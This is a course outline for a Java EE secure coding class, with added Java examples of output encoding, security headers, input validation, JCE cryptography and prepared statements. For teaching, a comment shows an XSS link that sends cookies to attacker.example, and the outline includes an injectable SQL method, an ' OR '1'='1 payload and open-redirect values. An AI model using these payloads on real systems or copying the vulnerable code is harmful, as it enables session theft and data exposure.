Secure Coding for Java EE Applications

Course Code

SEC117

Duration

3 Days

Building a secure web application in Java is an extremely difficult challenge. While Java EE is a fantastic platform for building critical applications, it provides little support for preventing flaws like those in the OWASP Top Ten, including Cross-Site Scripting (XSS), SQL injection, Cross-Site Request Forgery, Broken Authentication and Authorization, and more. This course teaches participants how to identify, diagnose, and fix these very common issues. Participants will perform hands-on security testing and code review on web applications to find these kinds of flaws, and they will learn and apply efficient and effective approaches for eliminating or avoiding these vulnerabilities in Java applications.

This course is intended for anyone writing Java EE applications. You’ll learn by actually finding problems using code review and application penetration testing techniques in a full Java EE application that is riddled with holes. We’ll design and implement fixes to many of these vulnerabilities in an Eclipse-based development environment, and then retest the application with security tools to verify that the problem has been eliminated. The course ends with a fun three-stage challenge designed to drive home the key lessons from the training.

This course goes way beyond the finding and exploiting of vulnerabilities. Participants will learn about the security controls that developers should use to avoid these issues. Understanding how security is supposed to work is the greatest tool you can possibly have for finding security problems.
This course is designed for:
  • Java EE Software Developers
  • Java EE Software Testers
  • Security Specialists
  • Application Architects
Upon completion of this course, participants will be able to:
  • Understand and be able to employ the security features involved with using HTTP (e.g., headers, cookies, SSL)
  • Understand and be able to apply application security design principles.
  • Be able to identify and explain common web application security threats (e.g., Cross-Site Scripting, SQL Injection, Access Control Attacks, “Man-in-the-middle” attacks, etc.) and implement mitigation techniques.
  • Be able to handle credentials securely while providing the full range of authentication support functions, including login, change password, forgot password, remember password, logout, re-authentication, and timeouts.
  • Be able to implement access control rules for the user interface, business logic, and data layers.
  • Learn how Clickjacking attacks work, and the security headers that can now be used to easily defend against them.
  • Be able to implement simple, straightforward Cross-Site Scripting defenses through proper output encoding and how to detect XSS vulnerabilities throughout an application.
  • Learn the strong benefits of proper input validation, and how to architect an effective and easy to use input validation framework.
  • Understand the dangers of command injection and techniques for avoiding the introduction of this type of vulnerability.
  • Be able to implement a consistent error (exception) handling and logging approach for an entire web application.
  • Learn when to apply cryptographic techniques and be able to choose algorithms and use encryption/decryption and hash functions securely.
  • Be able to select and implement appropriate auditing/logging capabilities.
  • Understand how automation can be used to avoid the use of components with known vulnerabilities.
  • Be able to review their applications for common security vulnerabilities using code review and penetration testing techniques.
  • Be familiar with native Java security mechanisms such as the Crypto APIs, Logging, User Principals, etc., and how they can be employed to produce secure web applications.
  • Understand the factors involved in securing a Web Services capability.
Introduction
Section Overview: This section describes and introduces the course, and instructors. It also provides setup instructions for the course exercises.
a) Training Program Introduction
b) Course Objectives, Approach, and Layout
c) Intro to Aspect Security/Instructors
d) Participants Introduce Themselves
e) Discussion of Applicable Corporate Initiatives
f) Review of Course Agenda
g) Install and Setup Testing Environment

Understanding HTTP and Web Technologies
Section Overview: This section is intended to provide the foundations needed to understand the upcoming application security concepts. It begins by describing the HTTP protocol and how it relates to web applications. It dives into various aspects of the protocol, in detail, to assist in the understanding of the entire communication path from client request, server processing, server response, and browser interpretation. It then discusses how a hacker proxy can be used to modify HTTP requests and where this proxy fits into the big picture. Finally, we begin the first hands-on lesson which is intended to get the participants familiar with the hands-on application and comfortable using the testing proxy.
a) HTTP Protocol (Requests, Responses, Headers, Cookies, Parameters, Response Codes)
i. Security of GET vs. POST
ii. SSL and Certificates
iii. Man-in-the-Middle Threat
iv. HTTP Strict Transport Security
b) Introducing Test Application and Security Testing Proxy
i. WebGoat Architecture Walkthrough
ii. Eclipse Getting Started
iii. Example Lab Description
iv. ZAP Overview
c) The need for Standard Security Controls
i. Common vulnerabilities and how standard controls avoid them
ii. OWASP’s ESAPI – Example Standard Security Controls
d) Java and Java EE Platform Security
i. Java Language and Platform Features
ii. Java Security Manager
e) Exercises and Labs
i. Hands-On Testing Exercise: WebGoat HTTP Basics
ii. Hands-On Testing Exercise: WebGoat and Proxy

How to Authenticate Users
Section Overview: This section introduces common web authentication methods along with their strengths and weaknesses. It discusses best practices associated with authentication and uses hands-on lessons to demonstrate some common authentication mistakes. Through this we discuss different technology specific authentication uses and configurations.
a) Overview
b) Authentication Mechanisms
c) Common Java EE Authentication Approaches (JNDI, JDBC, SiteMinder)
d) How to Protect Credentials from Disclosure
e) How to Protect Against Brute Force Attacks in Java EE applications
f) How to Provide Password Management Functions in Java EE applications
g) Exercises and Labs
i. Hands-On Testing Exercise: WebGoat – Basic Authentication
ii. Hands-On Testing Exercise: WebGoat – Authentication Cookies
iii. Spot the Bug(s): Flawed Password Change Page

How to Manage User Sessions
Section Overview: This section explains what session management is and how it works within a web application environment. It discusses common mistakes developers make regarding session management and attacks that can take advantage of these errors. The section discusses best practices associated with session management and technology specific implementation approaches.
a) Introduction to Java EE Sessions
b) Explanation of Session Lifecycle in Java EE (login, logout, reauthentication, timeouts)
c) How to Protect Against Java EE Session Hijacking
d) ESAPI Session Defenses
e) Exercises and Labs
i. Hands-On Testing Exercise: WebGoat – Weak Session Identifier
ii. Spot the Bug(s): Logout Flaws

How to Control Access
Section Overview: This section introduces Access Control in a web environment and the various complexities associated with implementing strong access protections. It walks through the importance of checking all access to sensitive functionality, defining application roles and functions, not relying only on presentation rendering, and implementing access controls at different levels, including: declarative (URL), programmatic (API) and instance (data) level. Throughout the section, various technology specific access control uses are discussed and demonstrated. This section also includes common best practices associated with access control.
a) Overview
b) Defining & Architecting Your Access Control Policy
i. Authorization Primitives
ii. Defining an Access Control Matrix
c) Java EE Presentation Layer Access Control
i. Single Role vs. Multi-Role Views
d) Environment Enforced Access Control in Java EE
i. Attack Surface
ii. Single Role vs. Multi-Role URLs
iii. Declarative Java EE Authorization (web.xml)
e) Business Layer Access Control In Java EE
i. Programmatic Java EE Authorization
ii. Single Role vs. Multi-Role Business Functions
f) Java EE Data Layer Access Control
i. The Object Reference Problem
ii. ESAPI Direct Object Reference Protection
g) Other Common Java EE Access Control Problems
h) ESAPI Access Control Mechanisms
i) Exercises and Labs
i. Hands-On Testing Exercise: WebGoat – Access Control
ii. Testing and Coding Lab: WebGoat – Access Control (Stages 1-2)
iii. Testing and Coding Lab: WebGoat – Access Control (Stages 3-4)
iv. Testing and Coding Lab: WebGoat – Access Control (Stages 5-6)

How to Protect Against Cross-Site Request Forgery (CSRF)
Section Overview: The section introduces Cross-Site Request Forgery, a very common web application attack that most developers aren’t familiar with. CSRF is an attack that tricks the victim into loading a page that contains a malicious request. It is malicious in the sense that it inherits the identity and privileges of the victim to perform an undesired function on the victim's behalf, like changing the victim's e-mail address, home address, or password, or purchasing something.

For most sites, such a request will automatically include any credentials associated with the site, such as the user's session cookie, basic auth credentials, IP address, Windows domain credentials, etc. Therefore, if the user has authenticated to the site, the site will have no way to distinguish this from a legitimate user request. This section discusses the significance of these types of flaws and presents several approaches for how developers can defend their applications against this type of attack.
a) Overview of CSRF
i. What is CSRF
ii. CSRF Vulnerability Pattern
iii. The Same Origin Policy
b) CSRF Vulnerability Types
i. Standard and Stored CSRF
c) Misconceptions: CSRF Defenses that Don’t Work
d) CSRF Recommended Defenses
i. Use of CSRF Tokens
ii. ESAPI’s CSRF Mechanism
iii. Protecting REST Interfaces Against CSRF
iv. OWASP’s CSRF Tester
e) CSRF’s relationship to XSS
f) Exercises and Labs
i. Hands-On Testing Exercise: WebGoat – CSRF

How to Protect Against Cross-Site Scripting (XSS)
Section Overview: The section covers in detail a very common web application attack known as Cross-Site Scripting (XSS). It explains how and why this attack works and the consequences of such attacks. It introduces and explains two types of XSS attacks (reflected and stored), demonstrates an attack, and walks through various buggy code examples. Finally, it allows the participants to apply what they have learned by executing XSS attacks in hands-on lessons. Throughout the section different technology specific protections, including output encoding and input validation, are explored and discussed.
a) Overview of XSS
i. Types of XSS (Stored and Reflected)
ii. Tricking the Browser Sandbox
iii. Consequences of XSS
b) How to Solve Java EE XSS Problems
i. Output Encoding
ii. ESAPI’s Output Encoding Mechanisms
iii. Java EE Filters
iv. Input Validation
v. ESAPI’s Input Validation Mechanisms
vi. HTTPOnly
vii. Response Headers to Help Prevent XSS
c) Exercises and Labs
i. Hands-On Testing Exercises: WebGoat – Stored and Reflected XSS
ii. Testing and Coding Lab: XSS - 4 Stages
iii. Hands-On Testing Exercises: WebGoat – HTTPOnly
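
The output-encoding fix from b) i. shown on a reflected-XSS sink, as an added example for this page (not course or ESAPI code). `encodeForHtml()` is a deliberately small stand-in for a library encoder such as `ESAPI.encoder().encodeForHTML()` or the OWASP Java Encoder's `Encode.forHtml()`; real code should use a maintained library. The servlet path and the `q` parameter are assumptions.

```java
import java.io.IOException;
import java.io.PrintWriter;
import javax.servlet.ServletException;
import javax.servlet.annotation.WebServlet;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;

/** Added example (not course code): a reflected-XSS sink and its fix by contextual output encoding. */
@WebServlet("/search")
public class SearchServlet extends HttpServlet {

    /**
     * Encode for HTML element content and double-quoted attribute values: every character that
     * can terminate text, an attribute or a tag becomes an entity, so attacker-supplied data is
     * always rendered as data. This is NOT sufficient for JavaScript, URL or CSS contexts, each of
     * which needs its own encoder.
     */
    static String encodeForHtml(String s) {
        if (s == null) return "";
        StringBuilder out = new StringBuilder(s.length() + 16);
        for (int i = 0; i < s.length(); i++) {
            char c = s.charAt(i);
            switch (c) {
                case '&':  out.append("&amp;");  break;
                case '<':  out.append("&lt;");   break;
                case '>':  out.append("&gt;");   break;
                case '"':  out.append("&#34;");  break;
                case '\'': out.append("&#39;");  break;   // &apos; is not defined in HTML 4
                case '/':  out.append("&#47;");  break;   // closes tags in some lenient parsers
                default:   out.append(c);
            }
        }
        return out.toString();
    }

    @Override
    protected void doGet(HttpServletRequest req, HttpServletResponse resp)
            throws ServletException, IOException {
        String q = req.getParameter("q");
        resp.setContentType("text/html;charset=UTF-8"); // declare the charset so the browser cannot sniff one
        PrintWriter out = resp.getWriter();

        // VULNERABLE (reflected XSS), kept only for contrast:
        //   out.println("<p>Results for " + q + "</p>");
        // A link such as /search?q=<script>new Image().src='http://attacker.example/?c='+document.cookie</script>
        // would run in the victim's browser with the victim's session.

        // FIXED: encode at the moment of output, for the context the data lands in.
        out.println("<p>Results for " + encodeForHtml(q) + "</p>");
        out.println("<input type=\"text\" name=\"q\" value=\"" + encodeForHtml(q) + "\">");
    }
}
```

The same rule applies in JSPs: `<c:out value="${param.q}"/>` escapes its output, while a bare `${param.q}` writes the raw parameter into the page.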

How to Protect Against Clickjacking Vulnerabilities
Section Overview: The section introduces another common web application attack most developers aren’t familiar with. It explains how and why allowing your content to be framed allows this attack to work and the consequences of such attacks. It discusses the significance of these types of flaws and presents several approaches for how developers can defend their applications against this type of attack.
a) Overview of Clickjacking
i. The Attack Deconstructed
ii. Evading CSRF Defenses
iii. Consequences of a Clickjacking Attack
b) How to Defend Against Clickjacking
i. Approach 1: Framebusting Code
ii. Approach 2: X-Frame-Options Header
iii. Approach 3: Content Security Policy (CSP)
c) Exercises and Labs
i. Hands-On Demo: WebGoat – Clickjacking
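
The response headers from this section (X-Frame-Options and CSP frame-ancestors), HTTP Strict Transport Security from the HTTP section, and the HTTPOnly cookie flag from the XSS section all come down to the same thing in Java EE: a filter that sets headers before the response is committed, plus the container's session cookie configuration. One filter serving all three, as an added example for this page (not course or ESAPI code); the class names and the one-year HSTS max-age are this example's choices.

```java
import java.io.IOException;
import javax.servlet.Filter;
import javax.servlet.FilterChain;
import javax.servlet.FilterConfig;
import javax.servlet.ServletContextEvent;
import javax.servlet.ServletContextListener;
import javax.servlet.ServletException;
import javax.servlet.ServletRequest;
import javax.servlet.ServletResponse;
import javax.servlet.SessionCookieConfig;
import javax.servlet.annotation.WebFilter;
import javax.servlet.annotation.WebListener;
import javax.servlet.http.HttpServletResponse;

/**
 * Added example (not course code): defensive response headers for every response, and
 * session cookie hardening through the Servlet 3.0 SessionCookieConfig API.
 */
@WebFilter(urlPatterns = "/*")
public class SecurityHeadersFilter implements Filter {

    @Override
    public void doFilter(ServletRequest req, ServletResponse res, FilterChain chain)
            throws IOException, ServletException {
        HttpServletResponse response = (HttpServletResponse) res;

        // Clickjacking: refuse to be framed by any other page. Send both headers: older browsers
        // only understand X-Frame-Options, newer ones give the CSP directive precedence.
        // Use SAMEORIGIN / 'self' instead if the application legitimately frames its own pages.
        response.setHeader("X-Frame-Options", "DENY");
        response.setHeader("Content-Security-Policy", "frame-ancestors 'none'");

        // HSTS: a browser that sees this over HTTPS refuses plain HTTP to the host for a year,
        // which closes the SSL-stripping man-in-the-middle window. Only meaningful on a TLS
        // response, and includeSubDomains must wait until every subdomain serves HTTPS.
        if (req.isSecure()) {
            response.setHeader("Strict-Transport-Security", "max-age=31536000; includeSubDomains");
        }

        // Stop MIME sniffing from turning an uploaded "image" into executable script.
        response.setHeader("X-Content-Type-Options", "nosniff");

        // Headers must be in place before anything is written, so set them before the chain runs.
        chain.doFilter(req, res);
    }

    @Override public void init(FilterConfig config) { }
    @Override public void destroy() { }
}

/**
 * HttpOnly keeps document.cookie from reading JSESSIONID after an XSS; Secure keeps the cookie
 * off plain-HTTP connections. Equivalent to <cookie-config> under <session-config> in web.xml.
 */
@WebListener
class SessionCookieHardening implements ServletContextListener {
    @Override
    public void contextInitialized(ServletContextEvent sce) {
        SessionCookieConfig cookie = sce.getServletContext().getSessionCookieConfig();
        cookie.setHttpOnly(true);
        cookie.setSecure(true);   // assumes the application is reachable over HTTPS only
    }
    @Override public void contextDestroyed(ServletContextEvent sce) { }
}
```

The headers are enforced by the browser before any of the page's own scripts run, which is what makes them more reliable than framebusting JavaScript (Approach 1). Check them with the proxy: every response, including error pages and redirects, should carry them, which is why the filter is mapped to `/*`.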

How to Architect Input Validation Solutions
Section Overview: The section provides a basis for understanding the importance of proper input validation. It walks through common design and implementation approaches to validate user input and discusses the strengths and weaknesses associated with each approach. It starts off with a focus on threats associated with unvalidated user input. It introduces and explains these threats, demonstrates the attacks, and allows participants to apply what they have learned by using hands-on lessons. Throughout the section different technology specific protections are explored and discussed as well as the best practices associated with quality attributes of proper input validation.
a) Introduction
i. Lack of Validation
ii. Hidden Fields
iii. Use of Positive Validation
iv. Regex’s
v. Unchecked Redirects and Forwards
b) How to Validate Outside Java EE Applications
c) How to Validate Within Java EE Applications
i. ESAPI’s Input Validation Mechanisms
d) How to Respond to Input Validation Issues in Java EE Applications
e) How to Validate Data from Other Sources
i. Safe File Uploads/Downloads
f) Exercises and Labs:
i. Spot the Bug(s): Input Validation Flaws
ii. Hands-On Testing Exercise: WebGoat – Hidden Fields
iii. Hands-On Testing Exercise: WebGoat – JavaScript
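
Positive validation with regular expressions (a) iii. and iv.) and a check for the unchecked redirect problem (a) v.), as an added example for this page (not course or ESAPI code). Field names, the patterns and the `ValidationException` type are assumptions; ESAPI's Validator applies the same idea with the patterns kept in a properties file.

```java
import java.net.URI;
import java.net.URISyntaxException;
import java.util.regex.Pattern;

/** Added example (not course code): allow-list input validation and a safe redirect target check. */
public final class InputValidators {
    private InputValidators() { }

    public static final class ValidationException extends RuntimeException {
        public ValidationException(String field) { super("Invalid value for " + field); }
    }

    // Describe what is allowed, never what is forbidden: a block-list of "<script>" is bypassed,
    // a pattern that admits only digits is not. matches() requires the whole input to match.
    private static final Pattern ACCOUNT_ID = Pattern.compile("[0-9]{6,12}");
    private static final Pattern USERNAME   = Pattern.compile("[A-Za-z0-9_.-]{3,32}");

    public static String requireAccountId(String value) {
        if (value == null || !ACCOUNT_ID.matcher(value).matches()) throw new ValidationException("accountId");
        return value;
    }

    public static String requireUsername(String value) {
        if (value == null || !USERNAME.matcher(value).matches()) throw new ValidationException("username");
        return value;
    }

    /**
     * Unchecked redirect: login?next=http://attacker.example lets a phishing link bounce the
     * victim off the trusted site after a real login. Accept only a site-relative path; a value
     * with a scheme or an authority (including protocol-relative "//host"), or one that does not
     * parse, is replaced by the fallback.
     */
    public static String safeRedirectTarget(String next, String fallback) {
        if (next == null || next.isEmpty()) return fallback;
        // Browsers normalise "/\host" to "//host" and strip some control characters; reject them outright.
        if (next.contains("\\") || next.chars().anyMatch(ch -> ch < 0x20)) return fallback;
        try {
            URI uri = new URI(next);
            if (uri.isAbsolute() || uri.getRawAuthority() != null) return fallback;
            String path = uri.getRawPath();
            if (path == null || !path.startsWith("/") || path.startsWith("//")) return fallback;
            return path + (uri.getRawQuery() == null ? "" : "?" + uri.getRawQuery());
        } catch (URISyntaxException e) {
            return fallback;
        }
    }
}
```

With this check, `/account?id=1` passes through unchanged, while `//attacker.example/`, `javascript:alert(1)` and `http://attacker.example/` all fall back to the application's own landing page. The same allow-list approach applies to forwards: map a user-supplied key onto a fixed set of internal paths rather than passing the value to `RequestDispatcher` directly.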

How to Protect Sensitive Data
Section Overview: This section discusses common cryptographic problems associated with web applications as well as caching of sensitive data. It dispels the myth that crypto is extremely complex by walking through various simple and straightforward code examples. These code examples are technology specific and include examples of encrypting, decrypting, hashing, and the use of SSL. It also discusses other common flaws that can lead to the exposure of sensitive data.
a) Overview
b) Cryptography in Java EE Applications
c) How to Choose the Right Algorithm
d) How to Use JCE to Encrypt, Decrypt, Sign, and Hash
i. ESAPI’s Encryption Mechanisms
e) How to Avoid Replay Attacks
f) How to Use SSL
g) How to Protect Sensitive Data in Caches in Java EE Applications
i. ESAPI’s AntiCaching Mechanisms
h) Exercises and Labs:
i. Spot the Bug(s): Flawed Use of Cryptography
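
Encrypt, decrypt and hash with the plain JCE (d) above), as an added example for this page; it is not course code and not ESAPI's Encryptor, though ESAPI wraps the same calls. AES in GCM mode gives confidentiality plus integrity, so a modified ciphertext is rejected rather than silently decrypted to garbage, and PBKDF2 with a random salt and a high iteration count replaces storing a bare MD5 or SHA-1 of a password. Key handling (a key generated per run here) and the parameter sizes are this example's choices.

```java
import java.nio.charset.StandardCharsets;
import java.security.MessageDigest;
import java.security.SecureRandom;
import java.security.spec.KeySpec;
import java.util.Arrays;
import javax.crypto.AEADBadTagException;
import javax.crypto.Cipher;
import javax.crypto.KeyGenerator;
import javax.crypto.SecretKey;
import javax.crypto.SecretKeyFactory;
import javax.crypto.spec.GCMParameterSpec;
import javax.crypto.spec.PBEKeySpec;

/** Added example (not course code): authenticated encryption and password hashing with the JCE. */
public class SensitiveData {
    private static final SecureRandom RNG = new SecureRandom();
    private static final int IV_BYTES = 12;             // 96-bit nonce, the recommended GCM size
    private static final int TAG_BITS = 128;
    private static final int SALT_BYTES = 16;
    private static final int PBKDF2_ITERATIONS = 100_000;

    /** Returns iv || ciphertext || tag. A fresh random IV per call: reusing one under the same key breaks GCM. */
    public static byte[] seal(SecretKey key, byte[] plaintext, byte[] associatedData) throws Exception {
        byte[] iv = new byte[IV_BYTES];
        RNG.nextBytes(iv);
        Cipher cipher = Cipher.getInstance("AES/GCM/NoPadding");   // never "AES" alone: that means ECB
        cipher.init(Cipher.ENCRYPT_MODE, key, new GCMParameterSpec(TAG_BITS, iv));
        if (associatedData != null) cipher.updateAAD(associatedData); // bound to the record, not encrypted
        byte[] ct = cipher.doFinal(plaintext);
        byte[] out = Arrays.copyOf(iv, IV_BYTES + ct.length);
        System.arraycopy(ct, 0, out, IV_BYTES, ct.length);
        return out;
    }

    /** Throws AEADBadTagException if the ciphertext, IV or associated data was modified. */
    public static byte[] open(SecretKey key, byte[] sealed, byte[] associatedData) throws Exception {
        if (sealed.length < IV_BYTES + TAG_BITS / 8) throw new AEADBadTagException("truncated");
        Cipher cipher = Cipher.getInstance("AES/GCM/NoPadding");
        cipher.init(Cipher.DECRYPT_MODE, key,
                    new GCMParameterSpec(TAG_BITS, Arrays.copyOfRange(sealed, 0, IV_BYTES)));
        if (associatedData != null) cipher.updateAAD(associatedData);
        return cipher.doFinal(sealed, IV_BYTES, sealed.length - IV_BYTES);
    }

    /** Password storage: returns salt || PBKDF2-HMAC-SHA256(password, salt). Store this, never the password. */
    public static byte[] hashPassword(char[] password, byte[] salt) throws Exception {
        KeySpec spec = new PBEKeySpec(password, salt, PBKDF2_ITERATIONS, 256);
        byte[] hash = SecretKeyFactory.getInstance("PBKDF2WithHmacSHA256").generateSecret(spec).getEncoded();
        byte[] out = Arrays.copyOf(salt, salt.length + hash.length);
        System.arraycopy(hash, 0, out, salt.length, hash.length);
        return out;
    }

    public static boolean verifyPassword(char[] password, byte[] stored) throws Exception {
        byte[] salt = Arrays.copyOfRange(stored, 0, SALT_BYTES);
        return MessageDigest.isEqual(stored, hashPassword(password, salt));   // constant-time compare
    }

    public static void main(String[] args) throws Exception {
        KeyGenerator kg = KeyGenerator.getInstance("AES");
        kg.init(256);                                    // in production the key comes from a keystore or KMS
        SecretKey key = kg.generateKey();
        byte[] aad = "customer=42".getBytes(StandardCharsets.UTF_8);              // constructed sample context
        byte[] sealed = seal(key, "4111111111111111".getBytes(StandardCharsets.UTF_8), aad);
        System.out.println("decrypted: " + new String(open(key, sealed, aad), StandardCharsets.UTF_8));

        sealed[sealed.length - 1] ^= 0x01;              // flip one bit of the authentication tag
        try {
            open(key, sealed, aad);
        } catch (AEADBadTagException e) {
            System.out.println("tampering detected");
        }

        byte[] salt = new byte[SALT_BYTES];
        RNG.nextBytes(salt);
        byte[] record = hashPassword("correct horse".toCharArray(), salt);
        System.out.println("right password accepted: " + verifyPassword("correct horse".toCharArray(), record));
        System.out.println("wrong password accepted: " + verifyPassword("wrong".toCharArray(), record));
    }
}
```

Three things the "Spot the Bug" lab typically turns on are visible here by contrast: the IV is random per message rather than a constant, the mode is GCM rather than ECB or unauthenticated CBC, and the password check is a salted, iterated hash compared in constant time. AES-256 needs the unlimited-strength policy on JDK releases older than 8u161.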

How to Use Databases Securely
Section Overview: The section provides the material necessary to use a database securely. Threats related to securely connecting to a database, validating input, using SQL, handling errors and logging, and validating results are covered. Some architectural concerns are also discussed in terms of centralizing the security functions related to accessing a database securely.
a) Overview/Goals
b) How to Prevent SQL Injection using JDBC
i. Use of Prepared Statements
ii. Use of Stored Procedures
iii. Using Dynamic Queries Safely
c) Protecting JDBC Connection Strings (usernames/passwords)
i. ESAPI’s Encrypted Properties Files
d) Minimizing Privilege
e) How to Handle SQL Exceptions and Verify Results
f) Database Layer Access Control
g) Architectural Patterns for Database Security (DAO)
h) Exercises and Labs:
i. Hands-On Testing Exercise: WebGoat – SQL Injection
ii. Testing and Coding Lab: WebGoat – SQL Injection – 4 Stages
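
The three approaches under b) side by side, as an added example for this page (not course or WebGoat code): the injectable dynamic query, the same query as a parameterized PreparedStatement, and the allow-list pattern for the one thing a parameter cannot carry, an identifier such as an ORDER BY column. The accounts table, its columns and the container-injected DataSource are this example's assumptions.

```java
import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.sql.Statement;
import java.util.ArrayList;
import java.util.Collections;
import java.util.HashMap;
import java.util.List;
import java.util.Map;
import javax.sql.DataSource;

/** Added example (not course code): SQL injection and its fix in plain JDBC. */
public class AccountDao {
    private final DataSource dataSource;

    public AccountDao(DataSource dataSource) { this.dataSource = dataSource; }

    /**
     * VULNERABLE: user input is concatenated into the SQL text. An owner value of
     *   ' OR '1'='1
     * returns every account, and a UNION clause reads other tables. Kept only as the "before".
     */
    public List<String> findAccountsUnsafe(String owner) throws SQLException {
        String sql = "SELECT account_no FROM accounts WHERE owner = '" + owner + "'";
        try (Connection c = dataSource.getConnection();
             Statement st = c.createStatement();
             ResultSet rs = st.executeQuery(sql)) {
            return collect(rs);
        }
    }

    /** FIXED: the query text is constant and the value travels as a bound parameter, never parsed as SQL. */
    public List<String> findAccounts(String owner) throws SQLException {
        String sql = "SELECT account_no FROM accounts WHERE owner = ?";
        try (Connection c = dataSource.getConnection();
             PreparedStatement ps = c.prepareStatement(sql)) {
            ps.setString(1, owner);                     // "' OR '1'='1" is now just an odd owner name
            try (ResultSet rs = ps.executeQuery()) {
                return collect(rs);
            }
        }
    }

    // Identifiers cannot be bound with '?', so map the user's choice onto a fixed set of column names.
    private static final Map<String, String> SORT_COLUMNS;
    static {
        Map<String, String> m = new HashMap<>();
        m.put("owner",  "owner");
        m.put("number", "account_no");
        m.put("opened", "opened_on");
        SORT_COLUMNS = Collections.unmodifiableMap(m);
    }

    /** Dynamic query done safely: only an allow-listed column name is ever spliced into the SQL. */
    public List<String> listAccounts(String owner, String sortKey, boolean descending) throws SQLException {
        String column = SORT_COLUMNS.get(sortKey);
        if (column == null) throw new IllegalArgumentException("unsupported sort key");
        String sql = "SELECT account_no FROM accounts WHERE owner = ? ORDER BY " + column
                   + (descending ? " DESC" : " ASC");
        try (Connection c = dataSource.getConnection();
             PreparedStatement ps = c.prepareStatement(sql)) {
            ps.setString(1, owner);
            try (ResultSet rs = ps.executeQuery()) {
                return collect(rs);
            }
        }
    }

    private static List<String> collect(ResultSet rs) throws SQLException {
        List<String> out = new ArrayList<>();
        while (rs.next()) out.add(rs.getString("account_no"));
        return out;
    }
}
```

Stored procedures called through CallableStatement are only as safe as their bodies: a procedure that builds SQL from its arguments with EXEC or EXECUTE IMMEDIATE is injectable again. Per d) and e), the DataSource should connect as an account limited to the tables and operations this DAO needs, and the SQLException message should be logged, not returned to the user.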

How to Handle Errors and Log Security Events
Section Overview: This section introduces the importance of proper error handling and security logging mechanisms for security critical events. Throughout the section technology specific logging APIs and error handling strategies will be introduced and discussed.
a) Overview
i. Example Real World Fail Opens
b) How to Configure Error Handling in Java EE
c) Java EE Error Handling Best Practices
d) What Events to Log and What Data to Capture
e) Standard Logging Mechanisms
i. Java Logging
ii. Log4j
iii. ESAPI
f) Detecting and Responding to Attacks
i. OWASP AppSensor
g) Exercise and Labs:
i. Spot the Bug(s): Improper Error Handling
ii. Hands-On Testing Exercise: WebGoat – Fail Open Authentication Pattern

Avoiding the Use of Components with Known Vulnerabilities
Section Overview: This section introduces the importance of keeping track of which versions of 3rd party and open source components are being used in a project, and keeping them up to date when new versions become available. Many updates to such components include security fixes; running without them introduces significant risk to your applications.
a) Overview
i. A Huge Risk Most Dev Teams aren’t Dealing With
ii. The Proliferation in the Use of Open Source
iii. Serious Vulnerabilities in Open Source are Common
b) What Can You Do?
i. Automation Can Warn You When Your Components Are Out-of-date/Vulnerable
ii. Develop a Process For Updating Frequently

How to Prevent Quality Issues from Introducing Vulnerabilities
Section Overview: Security is directly related to quality: as code quality drops, software vulnerabilities rise. This section explores the importance of establishing and following a coding guideline that is tailored to address the security approaches adopted by the project. Some specific code quality problems that are frequently linked with security are included. The section includes a discussion of what can be enforced automatically and some of the relevant tools.
a) Why Code Quality and Deployment Issues Lead to Vulnerabilities
b) General Code Quality Best Practices for Security
c) Handling Debug and Test Code (including Ant and JUnit)
d) How to Avoid Concurrency Vulnerabilities in Java EE Applications
e) Exercises
i. Hands-On Testing Exercise: WebGoat – Clues in HTML
ii. Spot the Bug(s): Find the Concurrency Flaws

How to Use XML Securely
Section Overview: This section discusses the use of XML for data storage and transmission. XML parsers and generators have been abused with certain types of injection attacks that need to be understood. Also, the use of XML schema for validation purposes will be covered. Finally, this section demonstrates the use of XML encryption and signature techniques and discusses scenarios for their use.
a) Overview
b) Security Risks Associated With XML
i. XML Documents and Data Stores
ii. XML-Based Communication
iii. XML Threats and Attacks
iv. XPath Injection Attack
c) Validating XML Content with Java (DTD, Schema)
i. Validation Challenges with XML
d) XML Cryptography and Signatures in Java

How to Access Services Securely
Section Overview: This section discusses security issues associated with external connections, and walks through various best practices. This section is used as a review of all the practices covered in the course thus far. Participants should realize that all the practices they’ve learned for protection of a web application should apply to an external connection as well.
a) A Pattern for using Services Securely
i. Vulnerability Examples
b) Applying the Pattern to Prevent Command Injection
c) Architecting Secure Service Access
d) Examples of How to Access Services Securely
e) Exercises and Labs:
i. Hands-On Testing Exercise: WebGoat – Command Injection

Web Services Security
Section Overview: This section discusses issues related to using web services securely, including the various standards available and special issues related to web services, SOAP, WSDL, and XML Schema.
a) How Do Web Services Work?
b) SOAP Introduction and Examples
c) WSDL Introduction and Examples
d) Java EE Web Service Client Using AXIS
e) Web Services Security Overview
f) Exercises and Labs:
i. Hands-On Testing Exercise: WebGoat – WS SOAP Request
ii. Hands-On Testing Exercise: WebGoat – WS WSDL Scanning
iii. Hands-On Testing Exercise: WebGoat – WS SQL Injection

HTML5 Security
Section Overview: HTML5 is gaining in popularity and browser support. This section describes a number of security features introduced in HTML5 and how developers can take advantage of them to improve the security of their applications and/or leverage new HTML capabilities in a secure way.
a) What is HTML5
b) HTML5: Local Storage
i. Security Implications of Using IndexedDB
c) HTML5: WebSockets
i. Using WebSockets Securely
d) Cross-Origin Resource Sharing (CORS)
i. CORS Preflight Requests
ii. CORS Security Risks

AppSec at DevOps Speed and Portfolio Scale
Section Overview: Software development is moving much faster than application security with new platforms, languages, frameworks, paradigms, and methodologies like Agile and DevOps. This section describes how development organizations can instrument their entire IT organization with passive sensors to collect real-time data that can be used to identify vulnerabilities, enhance security architecture, and enable application security activities to generate significant measurable value.
a) Comparison of AppSec to Healthcare
b) Traditional SDLC Approaches
c) Starting Over, at Portfolio Scale, and DevOps Speed
d) Example Sensors
i. Clickjacking
ii. Security Headers
iii. Access Control
iv. Known Vulnerable Components
v. CSRF
vi. Injection
vii. Architecture, Inventory, More …
e) Building Continuous AppSec Throughout Lifecycle
f) What Sensors Does Your Organization Need?
g) What Security Do You Expect vs. What Are You Actually Measuring?
h) Aligning Sensors with Business Concerns
i) Developing a Portfolio Wide Dashboard

References
a) Books
b) OWASP Resources
c) Microsoft Application Security Resources
d) Web Application Security Consortium Guidelines

The Challenge
Section Overview: The challenge section allows participants to step back, look at what they have learned and apply this knowledge by performing a final hack on the hands-on Challenge lesson. This lesson combines many of the vulnerabilities previously discussed into a single lesson (with multiple stages). Unlike previous lessons, which include hints to guide participants through each stage of an attack, this lesson contains no hints. While the instructor assists participants, this is the time to allow the participants to use their creativity and the knowledge they have gained from this course to successfully compromise the final lesson.
a) Exercises and Labs:
